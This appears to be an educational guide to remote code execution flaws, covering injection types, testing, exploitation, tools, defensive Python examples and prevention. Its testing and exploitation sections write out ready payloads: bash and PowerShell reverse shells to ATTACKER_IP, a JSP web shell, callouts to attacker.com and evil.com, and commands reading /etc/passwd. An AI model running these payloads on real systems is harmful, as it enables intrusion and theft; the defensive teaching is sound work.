Remote Code Execution (RCE) Vulnerabilities Explained

The complete guide to understanding, finding, and preventing RCE flaws

⚠️ Legal Disclaimer: This guide is for educational purposes only. Unauthorized testing is illegal.

What is Remote Code Execution?

Remote Code Execution (RCE) is a vulnerability that allows attackers to execute arbitrary code on a target system or application. It represents the most severe class of security flaws because:

  • Provides complete control over the vulnerable system
  • Often leads to full system compromise
  • Can be used to pivot to other systems in the network

A typical RCE attack unfolds in four steps:

  1. Vulnerable Input: the application accepts unsanitized user input in dangerous functions
  2. Malicious Payload: the attacker crafts input containing executable code
  3. Code Execution: the server processes the input and executes the attacker's code
  4. System Compromise: the attacker gains shell access or performs other malicious actions

Common RCE Vulnerability Types

1. Command Injection

Direct execution of system commands through vulnerable parameters:

; cat /etc/passwd
| id
`whoami`
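To make the command-injection pattern concrete from the defender's side, here is an added example (not code from the original post) contrasting the three ways an application can hand a user-supplied host name to `ping`: concatenated into a shell string (injectable), quoted with `shlex.quote` (metacharacters neutralised but a shell is still involved), and passed as an argv list with no shell at all. The function names and the `ping -c 1` command are assumptions made for the example.

```python
import shlex
import subprocess


def vulnerable_command(host: str) -> str:
    """The injectable pattern: user input concatenated into a shell command line.
    If this string reaches subprocess.run(..., shell=True), a value such as
    "8.8.8.8; id" makes /bin/sh run two commands."""
    return "ping -c 1 " + host


def quoted_command(host: str) -> str:
    """Still a shell string, but shlex.quote wraps the whole value as one word,
    so ';', '|', '`' and '$()' lose their meaning. Acceptable only where a shell
    cannot be avoided; the argv form below is the real fix."""
    return "ping -c 1 " + shlex.quote(host)


def hardened_argv(host: str) -> list:
    """No shell at all: the list goes straight to execve, so metacharacters are
    just bytes inside one argument. A leading '-' is still refused because the
    target program could parse it as an option (argument injection), and
    whitespace is refused because a host name never legitimately contains it."""
    if not host or host.startswith("-") or any(c.isspace() for c in host):
        raise ValueError("refusing host value: %r" % host)
    return ["ping", "-c", "1", host]


def run_ping(host: str) -> subprocess.CompletedProcess:
    # shell=False is the default: argv is never re-parsed by /bin/sh
    return subprocess.run(hardened_argv(host), capture_output=True, text=True, timeout=10)


if __name__ == "__main__":
    print(vulnerable_command("8.8.8.8; id"))   # two commands for the shell
    print(quoted_command("8.8.8.8; id"))       # one quoted word
    print(hardened_argv("8.8.8.8;id"))         # ';' is inert inside an argv element
```

Note that `hardened_argv` does not need a blocklist of shell metacharacters: without a shell there is nothing for them to act on, and the only remaining risk is the program's own option parsing, which the leading-dash check covers.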

2. Deserialization Attacks

Malicious object serialization leading to code execution:

Java, .NET, Python pickle objects
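The reason `pickle` belongs in this list is that a pickle stream can name any `module.attribute` and the loader will import and resolve it; that lookup is the execution primitive. The following added example (not from the original post) shows the hook where a loader can refuse: a `pickle.Unpickler` subclass whose `find_class` only resolves a short allowlist of builtins, alongside a JSON round-trip as the data-only alternative. The allowlist contents and the sample objects are constructed for this example; the stream that references `os.system` is built with `pickle.dumps(os.system)`, which only records the function's name and would simply return the function if loaded with plain `pickle.loads`.

```python
import builtins
import io
import json
import os
import pickle

# Only these builtins may be resolved from a stream (constructed allowlist for this example).
SAFE_BUILTINS = {"set", "frozenset", "range", "slice", "complex"}


class RestrictedUnpickler(pickle.Unpickler):
    """find_class is called for every GLOBAL/STACK_GLOBAL opcode in the stream,
    i.e. every time the pickle asks for 'module.name'. Refusing here is what
    stops a stream from pulling in os.system, subprocess.Popen and friends."""

    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError("global %s.%s is not permitted" % (module, name))


def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def is_safe_pickle(data: bytes) -> bool:
    """True if the stream loads without touching any non-allowlisted global."""
    try:
        restricted_loads(data)
        return True
    except pickle.UnpicklingError:
        return False


def json_roundtrip(obj):
    """Preferred for untrusted input: JSON cannot reference code at all."""
    return json.loads(json.dumps(obj))


# Constructed sample streams.
HARMLESS = pickle.dumps({"user": "alice", "roles": ["admin"], "ids": {1, 2}})
REFERENCES_OS_SYSTEM = pickle.dumps(os.system)   # a bare reference by name, nothing is called

if __name__ == "__main__":
    print(restricted_loads(HARMLESS))
    print(is_safe_pickle(REFERENCES_OS_SYSTEM))   # False: refused at find_class
```

The allowlist approach hardens a loader you cannot remove; where the wire format is under your control, the JSON round-trip is the better answer because there is no class-resolution step to protect.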

3. Server-Side Template Injection

Code execution through template engines:

{{7*7}}  → 49
${"ls".exec()}

4. File Inclusion Vulnerabilities

Including malicious files leading to code execution:

?page=http://evil.com/shell.txt
?load=php://filter/convert.base64-encode/resource=index.php

5. Buffer Overflows

Overwriting memory to control execution flow:

AAAAAAAAAAAAAAAAAAAA\xef\xbe\xad\xde

6. Expression Language Injection

Code execution through expression evaluation:

#{7*7}
${7*7}

Where to Find RCE Vulnerabilities

1. User Input Points

  • Form fields (search, contact forms)
  • File upload functionality
  • URL parameters
  • API endpoints

2. Dangerous Functions

Language     Dangerous functions
----------   ------------------------------------------------------
PHP          exec(), system(), passthru(), eval(), preg_replace()
Python       eval(), exec(), pickle.loads(), os.system()
Java         Runtime.exec(), ProcessBuilder(), JNDI lookup
JavaScript   eval(), Function(), setTimeout() with strings
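A table like this is most useful when it drives a code-review check. The added example below (not part of the original post) walks a Python module's AST and reports calls to the Python entries in the table plus a few related ones, treating `subprocess` calls as a finding only when `shell=True` is present, since the argv form is the safe pattern. The set of flagged names and the sample source are constructed for this example.

```python
import ast
from typing import List, Optional, Tuple

# Names that hand a string to an interpreter, a shell or a deserializer
# (constructed list for this example; extend it for your code base).
DANGEROUS_CALLS = {
    "eval", "exec", "compile",
    "os.system", "os.popen", "pickle.loads", "pickle.load", "yaml.load",
    "subprocess.call", "subprocess.run", "subprocess.Popen", "subprocess.check_output",
}
# These are only a problem when shell=True re-parses the command line.
SHELL_ONLY = {"subprocess.call", "subprocess.run", "subprocess.Popen", "subprocess.check_output"}


def _call_name(node: ast.Call) -> Optional[str]:
    """Return 'name' or 'module.name' for a call, ignoring deeper attribute chains."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
        return "%s.%s" % (func.value.id, func.attr)
    return None


def _has_shell_true(node: ast.Call) -> bool:
    return any(
        kw.arg == "shell" and isinstance(kw.value, ast.Constant) and kw.value.value is True
        for kw in node.keywords
    )


def find_dangerous_calls(source: str, filename: str = "<input>") -> List[Tuple[int, str]]:
    """Return (line, call name) for every dangerous call in the module source."""
    findings = []
    for node in ast.walk(ast.parse(source, filename)):
        if not isinstance(node, ast.Call):
            continue
        name = _call_name(node)
        if name is None or name not in DANGEROUS_CALLS:
            continue
        if name in SHELL_ONLY and not _has_shell_true(node):
            continue  # argv-style subprocess call: not a shell injection sink
        findings.append((node.lineno, name))
    return sorted(findings)


# Constructed sample module; line numbers are referenced in the comments.
SAMPLE_SOURCE = '''\
import os, pickle, subprocess
def handler(req):
    os.system("ping -c 1 " + req["host"])             # line 3: shell string from input
    subprocess.run(["ping", "-c", "1", req["host"]])  # line 4: argv form, not flagged
    subprocess.run("ls " + req["d"], shell=True)      # line 5: shell=True
    obj = pickle.loads(req.body)                      # line 6: deserializer
    return eval(req["expr"])                          # line 7: interpreter
'''

if __name__ == "__main__":
    for line, name in find_dangerous_calls(SAMPLE_SOURCE):
        print("%s:%d  %s" % ("sample.py", line, name))
```

The scanner deliberately stays syntactic: it does not know whether the argument is tainted, so every hit is a review prompt rather than a confirmed vulnerability, and a call reached through an alias (`from os import system`) needs the name table extended.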

Testing for RCE Vulnerabilities

1. Basic Testing Payloads

# Unix commands
; ls -la /
`id`
$(whoami)
| cat /etc/passwd

# Windows commands
& dir C:\
| type C:\Windows\win.ini
%SYSTEMROOT%\System32\calc.exe

2. Time-Based Detection

When blind, use time delays to confirm execution:

# Unix
; sleep 5
`sleep 5`
$(sleep 5)

# Windows
& timeout /t 5
| ping -n 5 127.0.0.1

3. Out-of-Band Detection

Use DNS or HTTP requests to confirm execution:

# Unix
; curl http://attacker.com/$(whoami)
`nslookup $(hostname).attacker.com`

# Windows
& nslookup %COMPUTERNAME%.attacker.com
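The basic, time-based and out-of-band payloads above are also what a defender should expect to see in web access logs. The added example below (not from the original post) parses request lines from a few constructed Apache-style log entries, URL-decodes the path and classifies each one against signatures for the four probe families this section describes: metacharacter-plus-command, delay commands, callouts to an external host, and template/expression probes. The log lines, the host `attacker.example` and the signature set are all constructed for this example.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import unquote_plus

REQUEST_RE = re.compile(r'"(?:GET|POST|PUT|PATCH) (\S+)')

# Constructed signature set for this example; order determines report order.
SIGNATURES: Dict[str, "re.Pattern"] = {
    # shell metacharacter followed by a reconnaissance command
    "command_injection": re.compile(r"(?:[;|&`]|\$\()\s*(?:ls|id|cat|whoami|dir|type|uname)\b", re.I),
    # delay primitives used for blind confirmation
    "time_based": re.compile(r"\b(?:sleep\s+\d+|timeout\s+/t\s+\d+|ping\s+-n\s+\d+)", re.I),
    # network client pointed at an external name
    "out_of_band": re.compile(r"\b(?:curl|wget|nslookup|dig)\s+\S*?[a-z0-9-]+\.[a-z]{2,}", re.I),
    # {{...}}, ${...} and #{...} evaluation probes
    "template_probe": re.compile(r"\{\{[^}]*\}\}|[$#]\{[^}]*\}"),
}


def classify(decoded_request: str) -> List[str]:
    """Return the signature names that match one URL-decoded request target."""
    return [name for name, pattern in SIGNATURES.items() if pattern.search(decoded_request)]


def scan_log(lines: List[str]) -> List[Tuple[str, List[str]]]:
    """Extract and decode the request target of each log line, then classify it."""
    results = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = unquote_plus(match.group(1))
        results.append((target, classify(target)))
    return results


# Constructed access-log sample.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /search?q=shoes HTTP/1.1" 200 512',
    '10.0.0.5 - - [10/Oct/2023:13:55:40 +0000] "GET /ping?host=8.8.8.8%3B+id HTTP/1.1" 200 301',
    '10.0.0.5 - - [10/Oct/2023:13:55:41 +0000] "GET /ping?host=127.0.0.1+%7C+sleep+5 HTTP/1.1" 200 88',
    '10.0.0.5 - - [10/Oct/2023:13:55:43 +0000] "GET /page?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 4012',
    '10.0.0.5 - - [10/Oct/2023:13:55:45 +0000] "GET /export?file=report%26+nslookup+host.attacker.example HTTP/1.1" 500 0',
]

if __name__ == "__main__":
    for target, hits in scan_log(SAMPLE_LOG):
        print("%-60s %s" % (target, ", ".join(hits) or "-"))
```

Two practical notes: decode before matching, because `%3B` and `%7C` are how the metacharacters actually arrive, and treat the time-based family as high priority when the corresponding response time in the log is also elevated, since that pairing is the signal an attacker is looking for.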

Exploiting RCE Vulnerabilities

1. Getting a Reverse Shell

# Unix
bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'

# Windows
powershell -c "$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

2. File Upload RCE

When file uploads are allowed:

# PHP shell


# JSP shell
<%= Runtime.getRuntime().exec(request.getParameter("cmd")) %>

3. Deserialization Exploits

Using ysoserial for Java deserialization:

java -jar ysoserial.jar CommonsCollections5 'curl attacker.com/shell.sh | bash' > payload.ser

Tools for Finding RCE Vulnerabilities

Tool         Purpose                            Command
----------   --------------------------------   -------------------------------------------
Burp Suite   Manual testing and scanning        Active Scan, Intruder
Commix       Automated command injection        commix -u "http://example.com?input=test"
Ysoserial    Java deserialization payloads      java -jar ysoserial.jar [gadget] [command]
SQLmap       SQLi to RCE via file operations    sqlmap -u "http://example.com?id=1" --os-shell
Metasploit   RCE exploit modules                use exploit/multi/handler

Preventing RCE Vulnerabilities

1. Secure Coding Practices

  • Avoid using eval() and similar functions
  • Use safe alternatives to system commands
  • Implement proper input validation

2. Security Controls

  • Implement Web Application Firewalls (WAF)
  • Use parameterized APIs instead of string concatenation
  • Apply the principle of least privilege

Pro Tip: Use process whitelisting where possible, only allowing specific, approved commands to execute.
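One way to put the process-whitelisting tip and the "parameterized APIs instead of string concatenation" control into code is a dispatch table: the client names an approved action, each action owns a fixed argv template and a validator for its single user-controlled argument, and nothing outside the table can be executed. The following is an added example (not from the original post); the two actions, their validators and the `/var/log/app/` directory are assumptions made for the illustration.

```python
import re
import subprocess
from typing import Callable, Dict, List, Tuple

# Validators accept exactly the grammar the argument needs, nothing more.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9]([A-Za-z0-9.-]{0,251}[A-Za-z0-9])?$")
LOG_NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}\.log$")   # bare file name, no path separators


def _valid_host(value: str) -> bool:
    return bool(HOSTNAME_RE.match(value))


def _valid_log_name(value: str) -> bool:
    return bool(LOG_NAME_RE.match(value))


# Constructed allowlist: action name -> (validator, argv builder).
# The builder never sees a shell, and the user controls only the validated argument.
ALLOWED_ACTIONS: Dict[str, Tuple[Callable[[str], bool], Callable[[str], List[str]]]] = {
    "ping":    (_valid_host,     lambda host: ["ping", "-c", "1", host]),
    "taillog": (_valid_log_name, lambda name: ["tail", "-n", "50", "/var/log/app/" + name]),
}


def build_argv(action: str, arg: str) -> List[str]:
    """Resolve an approved action to its argv, refusing unknown actions and bad arguments."""
    try:
        validate, template = ALLOWED_ACTIONS[action]
    except KeyError:
        raise PermissionError("action %r is not on the allowlist" % action) from None
    if not validate(arg):
        raise ValueError("argument rejected for action %r" % action)
    return template(arg)


def run_action(action: str, arg: str, timeout: float = 10) -> subprocess.CompletedProcess:
    # shell=False: argv goes straight to execve
    return subprocess.run(build_argv(action, arg), capture_output=True, text=True, timeout=timeout)


if __name__ == "__main__":
    print(build_argv("ping", "example.com"))
    print(build_argv("taillog", "app.log"))
    for action, arg in (("rm", "-rf"), ("ping", "8.8.8.8; id"), ("taillog", "../../etc/passwd")):
        try:
            build_argv(action, arg)
        except (PermissionError, ValueError) as exc:
            print("refused:", exc)
```

The table is the whole attack surface: adding a capability means adding a row with its own validator, and the audit question becomes "is every builder safe for every value its validator accepts" rather than "where does user input reach a shell".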

3. Runtime Protection

  • Disable dangerous functions in php.ini
  • Use Java Security Manager
  • Implement containerization with limited capabilities

Real-World RCE Examples

1. Log4Shell (CVE-2021-44228)

JNDI lookup vulnerability in Log4j allowing RCE through logged messages.

2. Apache Struts (CVE-2017-5638)

OGNL expression injection leading to RCE in file upload error handling.

3. PHP unserialize() Vulnerabilities

Numerous CMS vulnerabilities through unsafe object deserialization.

Conclusion

Remote Code Execution vulnerabilities represent the most critical web security risk because:

  • They provide complete system control to attackers
  • Often lead to full network compromise
  • Can be chained with other vulnerabilities

Remember: Defense-in-depth is crucial – combine secure coding, proper configuration, and runtime protections.
